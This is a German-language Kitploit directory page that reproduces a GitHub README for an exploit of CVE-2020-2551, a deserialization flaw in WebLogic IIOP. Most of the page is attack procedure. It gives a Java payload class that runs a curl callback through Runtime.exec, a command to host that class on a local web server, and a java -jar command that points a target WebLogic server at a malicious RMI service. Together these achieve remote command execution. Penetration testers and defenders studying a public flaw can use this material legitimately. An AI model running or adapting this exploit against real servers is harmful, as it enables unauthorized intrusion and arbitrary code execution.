Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Tools/GitHubGitHub/y4er/cve-2020-2551
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRemote-Access-ToolPayload-Entwicklung
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Repository anzeigen
33678vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-2551

Weblogic IIOP Deserialisierung

Testumgebung

Weblogic10.3.6+jdk1.6

Vorgepacktes JAR-Paket Extraktionscode: a6ob

Exploit

Laden Sie das JAR-Paket herunter, starten Sie dann mit marshalsec einen bösartigen RMI-Dienst und kompilieren Sie lokal eine exp.java

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Kompilieren Sie möglichst mit derselben JDK-Version und denselben Abhängigkeiten (wlfullclient.jar) wie Weblogic. Starten Sie dann lokal einen Webserver

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Führen Sie das JAR-Paket über die Befehlszeile aus

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

Das tatsächliche Ergebnis ist im Bild zu sehen image

Bekannte Probleme

Viele berichten, dass die Reproduktion fehlschlägt. Nachdem ich einige Artikel online gelesen hatte, stellte ich fest, dass IIOP ein NAT-Modus-Problem hat. Heute habe ich es auf Xianzhi gefunden: https://xz.aliyun.com/t/7498 . Bitte besuchen Sie den Link selbst.

Referenzen

https://y4er.com/post/weblogic-cve-2020-2551/

Tool herunterladen